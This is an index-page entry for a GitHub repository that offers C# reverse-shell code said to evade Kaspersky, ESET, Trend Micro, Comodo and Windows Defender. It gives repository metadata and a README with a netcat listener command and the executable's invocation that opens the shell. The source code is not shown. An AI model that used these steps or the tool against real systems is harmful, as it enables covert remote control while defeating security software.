Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/DamonMohammadbagher/NativePayload_ReverseShell
This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple)
https://github.com/DamonMohammadbagher/NativePayload_ReverseShell
antivirus antivirus-evasion bypass-antivirus redteam reverseshell
Last synced: 21 days ago
JSON representation
This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple)
- Host: GitHub
- URL: https://github.com/DamonMohammadbagher/NativePayload_ReverseShell
- Owner: DamonMohammadbagher
- Created: 2019-11-24T11:32:58.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2023-06-06T03:34:19.000Z (over 1 year ago)
- Last Synced: 2024-11-09T07:41:56.140Z (about 1 month ago)
- Topics: antivirus, antivirus-evasion, bypass-antivirus, redteam, reverseshell
- Language: C#
- Homepage:
- Size: 9.77 KB
- Stars: 111
- Watchers: 8
- Forks: 38
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - DamonMohammadbagher/NativePayload_ReverseShell - This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple) (C# #)
README
# NativePayload_ReverseShell
This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple)Note: it is "kind of Reverse shell", Can You Guess "Since When" : This Code Worked & Still Working... ?
//// Step 1 (Linux Side:192.168.56.1) : nc -l -p 443
//// Step 2 (Windows Side:192.168.56.x) : NativePayload_ReverseShell.exe 192.168.56.1 443
Video Step by Step : https://www.youtube.com/watch?v=VkFcy1Dg-pU&feature=youtu.beArticle : https://www.linkedin.com/pulse/bypassing-avs-c-managed-code-reverse-shell-damon-mohammadbagher/